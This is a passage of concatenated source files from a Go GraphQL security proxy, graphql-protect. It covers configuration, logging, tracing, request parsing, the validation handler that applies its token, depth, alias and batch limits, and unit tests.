| google.golang.org/api v0.232.0 18 | gopkg.in/yaml.v3 v3.0.1 19 | ) 20 | 21 | require ( 22 | cel.dev/expr v0.20.0 // indirect 23 | cloud.google.com/go v0.120.1 // indirect 24 | cloud.google.com/go/auth v0.16.1 // indirect 25 | cloud.google.com/go/auth/oauth2adapt 
v0.2.8 // indirect 26 | cloud.google.com/go/compute/metadata v0.6.0 // indirect 27 | cloud.google.com/go/iam v1.5.2 // indirect 28 | cloud.google.com/go/monitoring v1.24.0 // indirect 29 | github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.27.0 // indirect 30 | github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.51.0 // indirect 31 | github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.51.0 // indirect 32 | github.com/agnivade/levenshtein v1.2.1 // indirect 33 | github.com/beorn7/perks v1.0.1 // indirect 34 | github.com/cenkalti/backoff/v4 v4.3.0 // indirect 35 | github.com/cespare/xxhash/v2 v2.3.0 // indirect 36 | github.com/cncf/xds/go v0.0.0-20250121191232-2f005788dc42 // indirect 37 | github.com/davecgh/go-spew v1.1.1 // indirect 38 | github.com/envoyproxy/go-control-plane/envoy v1.32.4 // indirect 39 | github.com/envoyproxy/protoc-gen-validate v1.2.1 // indirect 40 | github.com/felixge/httpsnoop v1.0.4 // indirect 41 | github.com/go-jose/go-jose/v4 v4.0.5 // indirect 42 | github.com/go-logr/logr v1.4.2 // indirect 43 | github.com/go-logr/stdr v1.2.2 // indirect 44 | github.com/google/s2a-go v0.1.9 // indirect 45 | github.com/google/uuid v1.6.0 // indirect 46 | github.com/googleapis/enterprise-certificate-proxy v0.3.6 // indirect 47 | github.com/googleapis/gax-go/v2 v2.14.1 // indirect 48 | github.com/grpc-ecosystem/grpc-gateway/v2 v2.26.1 // indirect 49 | github.com/mattn/go-runewidth v0.0.16 // indirect 50 | github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 // indirect 51 | github.com/planetscale/vtprotobuf v0.6.1-0.20241011083415-71c992bc3c87 // indirect 52 | github.com/pmezard/go-difflib v1.0.0 // indirect 53 | github.com/prometheus/client_model v0.6.1 // indirect 54 | github.com/prometheus/common v0.62.0 // indirect 55 | github.com/prometheus/procfs v0.15.1 // indirect 56 | github.com/rivo/uniseg v0.4.7 // indirect 57 | github.com/spiffe/go-spiffe/v2 v2.5.0 
// indirect 58 | github.com/zeebo/errs v1.4.0 // indirect 59 | go.opentelemetry.io/auto/sdk v1.1.0 // indirect 60 | go.opentelemetry.io/contrib/bridges/prometheus v0.60.0 // indirect 61 | go.opentelemetry.io/contrib/detectors/gcp v1.35.0 // indirect 62 | go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.60.0 // indirect 63 | go.opentelemetry.io/contrib/propagators/aws v1.35.0 // indirect 64 | go.opentelemetry.io/contrib/propagators/b3 v1.35.0 // indirect 65 | go.opentelemetry.io/contrib/propagators/jaeger v1.35.0 // indirect 66 | go.opentelemetry.io/contrib/propagators/ot v1.35.0 // indirect 67 | go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc v0.11.0 // indirect 68 | go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploghttp v0.11.0 // indirect 69 | go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetricgrpc v1.35.0 // indirect 70 | go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetrichttp v1.35.0 // indirect 71 | go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.35.0 // indirect 72 | go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.35.0 // indirect 73 | go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.35.0 // indirect 74 | go.opentelemetry.io/otel/exporters/prometheus v0.57.0 // indirect 75 | go.opentelemetry.io/otel/exporters/stdout/stdoutlog v0.11.0 // indirect 76 | go.opentelemetry.io/otel/exporters/stdout/stdoutmetric v1.35.0 // indirect 77 | go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.35.0 // indirect 78 | go.opentelemetry.io/otel/log v0.11.0 // indirect 79 | go.opentelemetry.io/otel/metric v1.35.0 // indirect 80 | go.opentelemetry.io/otel/sdk/log v0.11.0 // indirect 81 | go.opentelemetry.io/otel/sdk/metric v1.35.0 // indirect 82 | go.opentelemetry.io/otel/trace v1.35.0 // indirect 83 | go.opentelemetry.io/proto/otlp v1.5.0 // indirect 84 | go.uber.org/multierr v1.11.0 // indirect 85 | golang.org/x/crypto v0.37.0 // indirect 86 | golang.org/x/net 
v0.39.0 // indirect 87 | golang.org/x/oauth2 v0.30.0 // indirect 88 | golang.org/x/sync v0.14.0 // indirect 89 | golang.org/x/sys v0.32.0 // indirect 90 | golang.org/x/text v0.24.0 // indirect 91 | golang.org/x/time v0.11.0 // indirect 92 | google.golang.org/genproto v0.0.0-20250303144028-a0af3efb3deb // indirect 93 | google.golang.org/genproto/googleapis/api v0.0.0-20250425173222-7b384671a197 // indirect 94 | google.golang.org/genproto/googleapis/rpc v0.0.0-20250428153025-10db94c68c34 // indirect 95 | google.golang.org/grpc v1.72.0 // indirect 96 | google.golang.org/protobuf v1.36.6 // indirect 97 | ) 98 | -------------------------------------------------------------------------------- /graphql-protect.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /internal/app/config/config.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "errors" 5 | "github.com/supportivefe/graphql-protect/internal/app/http" 6 | "github.com/supportivefe/graphql-protect/internal/app/log" 7 | "github.com/supportivefe/graphql-protect/internal/business/rules/accesslogging" 8 | "github.com/supportivefe/graphql-protect/internal/business/rules/aliases" 9 | "github.com/supportivefe/graphql-protect/internal/business/rules/batch" 10 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 11 | "github.com/supportivefe/graphql-protect/internal/business/rules/enforce_post" 12 | "github.com/supportivefe/graphql-protect/internal/business/rules/max_depth" 13 | "github.com/supportivefe/graphql-protect/internal/business/rules/tokens" 14 | "github.com/supportivefe/graphql-protect/internal/business/schema" 15 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 16 | "github.com/supportivefe/graphql-protect/internal/http/proxy" 17 | y 
// ErrConfigFileNotFound signals that no configuration file was present at the
// given path; callers still receive a usable default configuration alongside it.
var ErrConfigFileNotFound = errors.New("config file could not be found, defaults applied")

// Config is the root runtime configuration of graphql-protect.
// Each field maps to one top-level key in the YAML configuration file and
// carries the settings for a single protection rule or subsystem.
type Config struct {
	Web                       http.Config                    `yaml:"web"`
	Schema                    schema.Config                  `yaml:"schema"`
	Target                    proxy.Config                   `yaml:"target"`
	PersistedOperations       trusteddocuments.Config        `yaml:"persisted_operations"`
	ObfuscateValidationErrors bool                           `yaml:"obfuscate_validation_errors"`
	ObfuscateUpstreamErrors   bool                           `yaml:"obfuscate_upstream_errors"`
	BlockFieldSuggestions     block_field_suggestions.Config `yaml:"block_field_suggestions"`
	MaxTokens                 tokens.Config                  `yaml:"max_tokens"`
	MaxAliases                aliases.Config                 `yaml:"max_aliases"`
	EnforcePost               enforce_post.Config            `yaml:"enforce_post"`
	MaxDepth                  max_depth.Config               `yaml:"max_depth"`
	MaxBatch                  batch.Config                   `yaml:"max_batch"`
	AccessLogging             accesslogging.Config           `yaml:"access_logging"`
	Log                       log.Config                     `yaml:"log"`
	LogGraphqlErrors          bool                           `yaml:"log_graphql_errors"`
}

// String renders the configuration as YAML.
// On a marshalling error it returns the empty string rather than failing.
func (c Config) String() string {
	marshal, err := y.Marshal(c)
	if err != nil {
		return ""
	}

	return string(marshal)
}
// NewConfig initializes the runtime configuration.
// It starts from the built-in defaults and applies any user overrides on top.
// If no configuration file can be found, the defaults are returned together
// with ErrConfigFileNotFound; if the file exists but cannot be unmarshalled,
// a nil configuration and the unmarshalling error are returned.
func NewConfig(configPath string) (*Config, error) {
	cfg := defaults()

	bts, err := os.ReadFile(configPath)
	if err != nil {
		// The defaults remain usable; joining lets callers detect the
		// missing-file case via errors.Is(err, ErrConfigFileNotFound).
		return &cfg, errors.Join(ErrConfigFileNotFound, err)
	}

	err = y.Unmarshal(bts, &cfg)
	if err != nil {
		return nil, err
	}

	return &cfg, nil
}

// defaults returns the configuration applied when the user does not override
// a field; each subsystem contributes its own DefaultConfig.
func defaults() Config {
	return Config{
		Web:                       http.DefaultConfig(),
		Schema:                    schema.DefaultConfig(),
		Target:                    proxy.DefaultConfig(),
		PersistedOperations:       trusteddocuments.DefaultConfig(),
		ObfuscateValidationErrors: false,
		ObfuscateUpstreamErrors:   true,
		BlockFieldSuggestions:     block_field_suggestions.DefaultConfig(),
		MaxTokens:                 tokens.DefaultConfig(),
		MaxAliases:                aliases.DefaultConfig(),
		EnforcePost:               enforce_post.DefaultConfig(),
		MaxDepth:                  max_depth.DefaultConfig(),
		MaxBatch:                  batch.DefaultConfig(),
		AccessLogging:             accesslogging.DefaultConfig(),
		Log:                       log.DefaultConfig(),
		LogGraphqlErrors:          false,
	}
}
"github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 10 | "github.com/supportivefe/graphql-protect/internal/business/rules/enforce_post" 11 | "github.com/supportivefe/graphql-protect/internal/business/rules/max_depth" 12 | "github.com/supportivefe/graphql-protect/internal/business/rules/tokens" 13 | "github.com/supportivefe/graphql-protect/internal/business/schema" 14 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 15 | "github.com/supportivefe/graphql-protect/internal/http/proxy" 16 | "github.com/stretchr/testify/assert" 17 | "gopkg.in/yaml.v3" 18 | "os" 19 | "testing" 20 | "time" 21 | ) 22 | 23 | func TestNewConfig(t *testing.T) { 24 | tests := []struct { 25 | name string 26 | applyConfig func(file *os.File) 27 | want *Config 28 | wantErr bool 29 | }{ 30 | { 31 | name: "Assures defaults are applied correctly", 32 | applyConfig: func(_ *os.File) { 33 | 34 | }, 35 | want: func() *Config { 36 | cfg := defaults() 37 | return &cfg 38 | }(), 39 | wantErr: false, 40 | }, 41 | { 42 | name: "YAML overrides are applied", 43 | applyConfig: func(file *os.File) { 44 | _, _ = file.Write([]byte(` 45 | web: 46 | read_timeout: 1s 47 | write_timeout: 1s 48 | idle_timeout: 1s 49 | shutdown_timeout: 1s 50 | host: host 51 | path: path 52 | request_body_max_bytes: 2048 53 | 54 | target: 55 | host: host 56 | timeout: 1s 57 | keep_alive: 1s 58 | 59 | schema: 60 | path: "path" 61 | auto_reload: 62 | enabled: false 63 | interval: 1s 64 | 65 | obfuscate_validation_errors: true 66 | obfuscate_upstream_errors: false 67 | 68 | persisted_operations: 69 | enabled: true 70 | enable_debug_endpoint: true 71 | reject_on_failure: false 72 | loader: 73 | type: gcp 74 | location: some-bucket 75 | reload: 76 | enabled: true 77 | interval: 1s 78 | timeout: 1s 79 | 80 | max_aliases: 81 | enabled: false 82 | max: 1 83 | reject_on_failure: false 84 | 85 | block_field_suggestions: 86 | enabled: false 87 | mask: mask 88 | 89 | max_depth: 90 
| enabled: false 91 | max: 1 92 | reject_on_failure: false 93 | field: 94 | enabled: false 95 | max: 1 96 | reject_on_failure: false 97 | list: 98 | enabled: false 99 | max: 1 100 | reject_on_failure: false 101 | 102 | max_tokens: 103 | enabled: false 104 | max: 1 105 | reject_on_failure: false 106 | 107 | max_batch: 108 | enabled: false 109 | max: 1 110 | reject_on_failure: false 111 | 112 | enforce_post: 113 | enabled: false 114 | 115 | access_logging: 116 | enabled: false 117 | include_headers: 118 | - Authorization 119 | include_operation_name: false 120 | include_variables: false 121 | include_payload: true 122 | 123 | log: 124 | format: text 125 | 126 | `)) 127 | }, 128 | want: &Config{ 129 | Web: http.Config{ 130 | ReadTimeout: 1 * time.Second, 131 | WriteTimeout: 1 * time.Second, 132 | IdleTimeout: 1 * time.Second, 133 | ShutdownTimeout: 1 * time.Second, 134 | Host: "host", 135 | Path: "path", 136 | RequestBodyMaxBytes: 2048, 137 | }, 138 | ObfuscateValidationErrors: true, 139 | ObfuscateUpstreamErrors: false, 140 | Schema: schema.Config{ 141 | Path: "path", 142 | AutoReload: struct { 143 | Enabled bool `yaml:"enabled"` 144 | Interval time.Duration `yaml:"interval"` 145 | }(struct { 146 | Enabled bool 147 | Interval time.Duration 148 | }{Enabled: false, Interval: 1 * time.Second}), 149 | }, 150 | Target: proxy.Config{ 151 | Timeout: 1 * time.Second, 152 | KeepAlive: 1 * time.Second, 153 | Host: "host", 154 | }, 155 | PersistedOperations: trusteddocuments.Config{ 156 | Enabled: true, 157 | EnableDebugEndpoint: true, 158 | Loader: trusteddocuments.LoaderConfig{ 159 | Type: "gcp", 160 | Location: "some-bucket", 161 | Reload: struct { 162 | Enabled bool `yaml:"enabled"` 163 | Interval time.Duration `yaml:"interval"` 164 | Timeout time.Duration `yaml:"timeout"` 165 | }{ 166 | Enabled: true, 167 | Interval: 1 * time.Second, 168 | Timeout: 1 * time.Second, 169 | }, 170 | }, 171 | RejectOnFailure: false, 172 | }, 173 | BlockFieldSuggestions: 
block_field_suggestions.Config{ 174 | Enabled: false, 175 | Mask: "mask", 176 | }, 177 | MaxTokens: tokens.Config{ 178 | Enabled: false, 179 | Max: 1, 180 | RejectOnFailure: false, 181 | }, 182 | MaxAliases: aliases.Config{ 183 | Enabled: false, 184 | Max: 1, 185 | RejectOnFailure: false, 186 | }, 187 | EnforcePost: enforce_post.Config{ 188 | Enabled: false, 189 | }, 190 | MaxDepth: max_depth.Config{ 191 | Enabled: false, 192 | Max: 1, 193 | RejectOnFailure: false, 194 | Field: max_depth.MaxRule{ 195 | Enabled: false, 196 | Max: 1, 197 | RejectOnFailure: false, 198 | }, 199 | List: max_depth.MaxRule{ 200 | Enabled: false, 201 | Max: 1, 202 | RejectOnFailure: false, 203 | }, 204 | }, 205 | MaxBatch: batch.Config{ 206 | Enabled: false, 207 | Max: 1, 208 | RejectOnFailure: false, 209 | }, 210 | AccessLogging: accesslogging.Config{ 211 | Enabled: false, 212 | IncludedHeaders: []string{"Authorization"}, 213 | IncludeOperationName: false, 214 | IncludeVariables: false, 215 | IncludePayload: true, 216 | }, 217 | Log: log.Config{ 218 | Format: log.TextFormat, 219 | }, 220 | }, 221 | wantErr: false, 222 | }, 223 | } 224 | for _, tt := range tests { 225 | t.Run(tt.name, func(t *testing.T) { 226 | file, _ := os.CreateTemp("", "") 227 | defer func() { 228 | _ = os.Remove(file.Name()) 229 | }() 230 | 231 | tt.applyConfig(file) 232 | 233 | got, err := NewConfig(file.Name()) 234 | assert.NoError(t, err) 235 | 236 | assert.Equal(t, tt.want, got) 237 | }) 238 | } 239 | } 240 | 241 | // WriteDefaultConfigToYaml is used to write a configuration file with pure defaults to a yaml file. 242 | // This makes it really easy to copy-paste it onto documentation examples. 
package http

import "time"

// kilobyte100 is 100 KiB, the default cap on incoming request body size.
const kilobyte100 = 102_400 // 100kb

// Config holds the settings for graphql-protect's own HTTP listener.
type Config struct {
	ReadTimeout     time.Duration `yaml:"read_timeout"`
	WriteTimeout    time.Duration `yaml:"write_timeout"`
	IdleTimeout     time.Duration `yaml:"idle_timeout"`
	ShutdownTimeout time.Duration `yaml:"shutdown_timeout"`
	Host            string        `yaml:"host"`
	// or maybe we just want to listen on everything and forward
	Path string `yaml:"path"`
	// DebugHost string `yaml:"debug_host"`
	// RequestBodyMaxBytes limits the accepted request body size in bytes;
	// a value of 0 disables the limit (see GraphQLProtect.handle).
	RequestBodyMaxBytes int `yaml:"request_body_max_bytes"`
}

// DefaultConfig returns the listener settings used when no overrides are
// given: listen on 0.0.0.0:8080 and serve GraphQL on /graphql.
func DefaultConfig() Config {
	return Config{
		ReadTimeout:         5 * time.Second,
		WriteTimeout:        10 * time.Second,
		IdleTimeout:         2 * time.Minute,
		ShutdownTimeout:     20 * time.Second,
		Host:                "0.0.0.0:8080",
		Path:                "/graphql",
		RequestBodyMaxBytes: kilobyte100,
	}
}
= "json" 20 | TextFormat = "text" 21 | ) 22 | 23 | func NewLogger(cfg Config) *slog.Logger { 24 | if cfg.Format == TextFormat { 25 | return slog.Default() 26 | } 27 | return slog.New(slog.NewJSONHandler(os.Stdout, nil)) 28 | } 29 | -------------------------------------------------------------------------------- /internal/app/metrics/metrics.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "github.com/prometheus/client_golang/prometheus/collectors" 6 | "regexp" 7 | ) 8 | 9 | func init() { 10 | // Register metrics from GoCollector collecting statistics from the Go Runtime. 11 | // This enabled default, recommended metrics with the additional, recommended metric for 12 | // goroutine scheduling latencies histogram that is currently bit too expensive for the default option. 13 | // 14 | // See the related GopherConUK talk to learn more: https://www.youtube.com/watch?v=18dyI_8VFa0 15 | 16 | // Unregister the default GoCollector. 17 | prometheus.Unregister(collectors.NewGoCollector()) 18 | 19 | // Register the default GoCollector with a custom config. 
// SetupOTELSDK bootstraps the OpenTelemetry SDK for this process: it installs
// the global text-map propagator (configured via OTEL_PROPAGATORS) and a trace
// provider. It returns a shutdown function that flushes and releases the
// resources of every component that was successfully set up; the errors of all
// cleanup calls are joined.
func SetupOTELSDK(ctx context.Context, version string) (shutdown func(context.Context) error, err error) {
	var shutdownFuncs []func(context.Context) error
	// shutdown calls cleanup functions registered via shutdownFuncs.
	// The errors from the calls are joined.
	// Each registered cleanup will be invoked once; the nil reset makes a
	// second call of shutdown a no-op.
	shutdown = func(ctx context.Context) error {
		var err error
		for _, fn := range shutdownFuncs {
			err = errors.Join(err, fn(ctx))
		}
		shutdownFuncs = nil
		return err
	}

	// handleErr calls shutdown for cleanup and makes sure that all errors are
	// returned via the named return value.
	handleErr := func(inErr error) {
		err = errors.Join(inErr, shutdown(ctx))
	}

	// NewTextMapPropagator returns a TraceContext and Baggage propagator by
	// default. The response of this function can be directly registered with
	// the go.opentelemetry.io/otel package.
	otel.SetTextMapPropagator(autoprop.NewTextMapPropagator())

	// Set up trace provider.
	tracerProvider, err := newTraceProvider(ctx, version)
	if err != nil {
		handleErr(err)
		return
	}
	shutdownFuncs = append(shutdownFuncs, tracerProvider.Shutdown)
	otel.SetTracerProvider(tracerProvider)

	return
}

// newTraceProvider builds a TracerProvider that batches spans to an exporter
// selected through the OTEL_* environment variables (autoexport), tagging all
// spans with the given service version.
func newTraceProvider(ctx context.Context, version string) (*trace.TracerProvider, error) {
	traceExporter, err := autoexport.NewSpanExporter(ctx)
	if err != nil {
		return nil, err
	}

	traceProvider := trace.NewTracerProvider(
		trace.WithBatcher(traceExporter),
		trace.WithResource(resource.NewWithAttributes(
			semconv.SchemaURL,
			semconv.ServiceVersionKey.String(version),
		)),
	)
	return traceProvider, nil
}
40 | } 41 | 42 | func ParseRequestPayload(r *http.Request) ([]RequestData, error) { 43 | if r.ContentLength < 1 { 44 | return []RequestData{}, nil 45 | } 46 | 47 | body, err := io.ReadAll(r.Body) 48 | if err != nil { 49 | var maxBytesError *http.MaxBytesError 50 | if errors.As(err, &maxBytesError) { 51 | requestMaxBodyBytesExceededCounter.WithLabelValues().Inc() 52 | } 53 | return []RequestData{}, err 54 | } 55 | // Replace the body with a new reader after reading from the original 56 | r.Body = io.NopCloser(bytes.NewBuffer(body)) 57 | 58 | body = bytes.TrimSpace(body) 59 | // assume its a batch request 60 | if body[0] == '[' { 61 | var data []RequestData 62 | err = json.Unmarshal(body, &data) 63 | if err != nil { 64 | return []RequestData{}, err 65 | } 66 | return data, nil 67 | } 68 | var data RequestData 69 | err = json.Unmarshal(body, &data) 70 | if err != nil { 71 | return []RequestData{}, err 72 | } 73 | return []RequestData{data}, nil 74 | } 75 | -------------------------------------------------------------------------------- /internal/business/gql/gql_test.go: -------------------------------------------------------------------------------- 1 | package gql 2 | 3 | import ( 4 | "bytes" 5 | "fmt" 6 | "net/http" 7 | "net/http/httptest" 8 | "reflect" 9 | "testing" 10 | ) 11 | 12 | func TestParseRequestPayload(t *testing.T) { 13 | type args struct { 14 | r *http.Request 15 | } 16 | tests := []struct { 17 | name string 18 | args args 19 | want []RequestData 20 | wantErr bool 21 | }{ 22 | { 23 | name: "parses regular operation correctly", 24 | args: args{ 25 | r: func() *http.Request { 26 | payload := ` 27 | { 28 | "query": "something", 29 | "variables": { 30 | "baz": "foobar" 31 | }, 32 | "extensions": { 33 | "foo": "bar" 34 | } 35 | } 36 | ` 37 | body := bytes.NewBuffer([]byte(payload)) 38 | return httptest.NewRequest("POST", "/graphql", body) 39 | }(), 40 | }, 41 | want: []RequestData{ 42 | { 43 | Variables: map[string]interface{}{ 44 | "baz": "foobar", 45 | }, 
46 | Query: "something", 47 | Extensions: Extensions{}, 48 | }, 49 | }, 50 | wantErr: false, 51 | }, 52 | { 53 | name: "parses batched operation correctly", 54 | args: args{ 55 | r: func() *http.Request { 56 | payload := ` 57 | [ 58 | { 59 | "query": "query batched 1", 60 | "variables": { 61 | "baz": "variables batched 1" 62 | }, 63 | "extensions": { 64 | "foo": "extension batched 1" 65 | } 66 | }, 67 | { 68 | "query": "query batched 2", 69 | "variables": { 70 | "baz": "variables batched 2" 71 | }, 72 | "extensions": { 73 | "foo": "extensions batched 2" 74 | } 75 | } 76 | ] 77 | ` 78 | body := bytes.NewBuffer([]byte(payload)) 79 | return httptest.NewRequest("POST", "/graphql", body) 80 | }(), 81 | }, 82 | want: []RequestData{ 83 | { 84 | Variables: map[string]interface{}{ 85 | "baz": "variables batched 1", 86 | }, 87 | Query: "query batched 1", 88 | Extensions: Extensions{}, 89 | }, 90 | { 91 | Variables: map[string]interface{}{ 92 | "baz": "variables batched 2", 93 | }, 94 | Query: "query batched 2", 95 | Extensions: Extensions{}, 96 | }, 97 | }, 98 | wantErr: false, 99 | }, 100 | { 101 | name: "Handles request without body gracefully", 102 | args: args{ 103 | r: func() *http.Request { 104 | return httptest.NewRequest("POST", "/graphql", nil) 105 | }(), 106 | }, 107 | want: []RequestData{}, 108 | wantErr: false, 109 | }, 110 | } 111 | for _, tt := range tests { 112 | t.Run(tt.name, func(t *testing.T) { 113 | got, err := ParseRequestPayload(tt.args.r) 114 | if (err != nil) != tt.wantErr { 115 | t.Errorf("ParseRequestPayload() error = %v, wantErr %v", err, tt.wantErr) 116 | return 117 | } 118 | if !reflect.DeepEqual(got, tt.want) { 119 | t.Errorf("ParseRequestPayload() got = %v, want %v", got, tt.want) 120 | } 121 | }) 122 | } 123 | } 124 | 125 | func BenchmarkCheckJSONType(b *testing.B) { 126 | // Create a sample JSON object 127 | jsonObject := []byte(`{ 128 | "query": "something", 129 | "variables": { 130 | "baz": "foobar" 131 | }, 132 | "extensions": { 133 | 
"foo": "bar" 134 | } 135 | },`) 136 | 137 | // Create a sample JSON array 138 | jsonArray := []byte(fmt.Sprintf("[%[1]s, %[1]s, %[1]s, %[1]s, %[1]s]", jsonObject)) 139 | 140 | for i := 0; i < b.N; i++ { 141 | // Benchmark decoding a JSON object 142 | b.Run("JSON Object", func(b *testing.B) { 143 | for j := 0; j < b.N; j++ { 144 | r := httptest.NewRequest("POST", "/graphql", bytes.NewBuffer(jsonObject)) 145 | _, _ = ParseRequestPayload(r) 146 | } 147 | }) 148 | 149 | // Benchmark decoding a JSON array 150 | b.Run("JSON Array", func(b *testing.B) { 151 | for j := 0; j < b.N; j++ { 152 | r := httptest.NewRequest("POST", "/graphql", bytes.NewBuffer(jsonArray)) 153 | _, _ = ParseRequestPayload(r) 154 | } 155 | }) 156 | } 157 | } 158 | -------------------------------------------------------------------------------- /internal/business/protect/protect.go: -------------------------------------------------------------------------------- 1 | package protect 2 | 3 | import ( 4 | "encoding/json" 5 | "errors" 6 | "github.com/supportivefe/graphql-protect/internal/app/config" 7 | "github.com/supportivefe/graphql-protect/internal/business/gql" 8 | "github.com/supportivefe/graphql-protect/internal/business/rules/accesslogging" 9 | "github.com/supportivefe/graphql-protect/internal/business/rules/aliases" 10 | "github.com/supportivefe/graphql-protect/internal/business/rules/batch" 11 | "github.com/supportivefe/graphql-protect/internal/business/rules/enforce_post" 12 | "github.com/supportivefe/graphql-protect/internal/business/rules/max_depth" 13 | "github.com/supportivefe/graphql-protect/internal/business/rules/tokens" 14 | "github.com/supportivefe/graphql-protect/internal/business/schema" 15 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 16 | "github.com/vektah/gqlparser/v2/ast" 17 | "github.com/vektah/gqlparser/v2/gqlerror" 18 | "github.com/vektah/gqlparser/v2/parser" 19 | "github.com/vektah/gqlparser/v2/validator" 20 | "go.opentelemetry.io/otel" 21 | 
"log/slog" 22 | "net/http" 23 | ) 24 | 25 | var ( 26 | ErrRedacted = errors.New("error(s) redacted") 27 | 28 | tracer = otel.Tracer("github.com/supportivefe/graphql-protect/internal/business/protect") 29 | ) 30 | 31 | type GraphQLProtect struct { 32 | log *slog.Logger 33 | cfg *config.Config 34 | schema *schema.Provider 35 | tokens *tokens.MaxTokensRule 36 | maxBatch *batch.MaxBatchRule 37 | accessLogging *accesslogging.AccessLogging 38 | next http.Handler 39 | preFilterChain func(handler http.Handler) http.Handler 40 | } 41 | 42 | func NewGraphQLProtect(log *slog.Logger, cfg *config.Config, po *trusteddocuments.Handler, schema *schema.Provider, upstreamHandler http.Handler) (*GraphQLProtect, error) { 43 | aliases.NewMaxAliasesRule(cfg.MaxAliases) 44 | max_depth.NewMaxDepthRule(log, cfg.MaxDepth) 45 | maxBatch, err := batch.NewMaxBatch(cfg.MaxBatch) 46 | if err != nil { 47 | log.Warn("Error initializing maximum batch protection", "err", err) 48 | } 49 | 50 | accessLogging := accesslogging.NewAccessLogging(cfg.AccessLogging, log) 51 | 52 | enforcePostMethod := enforce_post.EnforcePostMethod(cfg.EnforcePost) 53 | 54 | return &GraphQLProtect{ 55 | log: log, 56 | cfg: cfg, 57 | schema: schema, 58 | tokens: tokens.MaxTokens(cfg.MaxTokens), 59 | maxBatch: maxBatch, 60 | accessLogging: accessLogging, 61 | preFilterChain: func(next http.Handler) http.Handler { 62 | return enforcePostMethod(po.SwapHashForQuery(next)) 63 | }, 64 | next: upstreamHandler, 65 | }, nil 66 | } 67 | 68 | func (p *GraphQLProtect) ServeHTTP(w http.ResponseWriter, r *http.Request) { 69 | ctx, span := tracer.Start(r.Context(), "Handle Request") 70 | defer span.End() 71 | p.preFilterChain(http.HandlerFunc(p.handle)).ServeHTTP(w, r.WithContext(ctx)) 72 | } 73 | 74 | func (p *GraphQLProtect) handle(w http.ResponseWriter, r *http.Request) { 75 | if p.cfg.Web.RequestBodyMaxBytes != 0 { 76 | r.Body = http.MaxBytesReader(w, r.Body, int64(p.cfg.Web.RequestBodyMaxBytes)) 77 | } 78 | 79 | payloads, 
validationErrors := p.validateRequest(r) 80 | 81 | p.accessLogging.Log(payloads, r.Header) 82 | 83 | if len(validationErrors) > 0 { 84 | if p.cfg.ObfuscateValidationErrors { 85 | validationErrors = gqlerror.List{gqlerror.Wrap(ErrRedacted)} 86 | } 87 | 88 | response := map[string]interface{}{ 89 | "data": nil, 90 | "errors": validationErrors, 91 | } 92 | 93 | w.Header().Set("Content-Type", "application/json") 94 | err := json.NewEncoder(w).Encode(response) 95 | if err != nil { 96 | p.log.Error("could not encode error", "err", err) 97 | } 98 | return 99 | } 100 | 101 | p.next.ServeHTTP(w, r) 102 | } 103 | 104 | func (p *GraphQLProtect) validateRequest(r *http.Request) ([]gql.RequestData, gqlerror.List) { 105 | payload, err := gql.ParseRequestPayload(r) 106 | if err != nil { 107 | return nil, gqlerror.List{gqlerror.Wrap(err)} 108 | } 109 | 110 | var errs gqlerror.List 111 | 112 | err = p.maxBatch.Validate(payload) 113 | if err != nil { 114 | errs = append(errs, gqlerror.Wrap(err)) 115 | } 116 | 117 | if err != nil { 118 | return nil, errs 119 | } 120 | 121 | for _, data := range payload { 122 | validationErrors := p.ValidateQuery(data.Query) 123 | if len(validationErrors) > 0 { 124 | errs = append(errs, validationErrors...) 
125 | } 126 | } 127 | 128 | return payload, errs 129 | } 130 | 131 | func (p *GraphQLProtect) ValidateQuery(operation string) gqlerror.List { 132 | operationSource := &ast.Source{ 133 | Input: operation, 134 | } 135 | 136 | err := p.tokens.Validate(operationSource) 137 | if err != nil { 138 | return gqlerror.List{gqlerror.Wrap(err)} 139 | } 140 | 141 | query, err := parser.ParseQuery(operationSource) 142 | if err != nil { 143 | return gqlerror.List{gqlerror.Wrap(err)} 144 | } 145 | 146 | return validator.Validate(p.schema.Get(), query) 147 | } 148 | -------------------------------------------------------------------------------- /internal/business/protect/protect_test.go: -------------------------------------------------------------------------------- 1 | package protect 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/app/config" 5 | _http "github.com/supportivefe/graphql-protect/internal/app/http" 6 | "github.com/supportivefe/graphql-protect/internal/business/rules/accesslogging" 7 | "github.com/supportivefe/graphql-protect/internal/business/rules/batch" 8 | "github.com/supportivefe/graphql-protect/internal/business/rules/tokens" 9 | "github.com/supportivefe/graphql-protect/internal/business/schema" 10 | "github.com/stretchr/testify/assert" 11 | "io" 12 | "log/slog" 13 | "net/http" 14 | "net/http/httptest" 15 | "strings" 16 | "testing" 17 | "time" 18 | ) 19 | 20 | func TestGraphQLProtect_ServeHTTP(t *testing.T) { 21 | log := slog.Default() 22 | 23 | type fields struct { 24 | log *slog.Logger 25 | cfg *config.Config 26 | schema *schema.Provider 27 | tokens *tokens.MaxTokensRule 28 | maxBatch *batch.MaxBatchRule 29 | accessLogging *accesslogging.AccessLogging 30 | next http.Handler 31 | preFilterChain func(handler http.Handler) http.Handler 32 | } 33 | tests := []struct { 34 | name string 35 | fields fields 36 | want string 37 | }{ 38 | { 39 | name: "request body limit is respected", 40 | fields: fields{ 41 | log: log, 42 | cfg: 
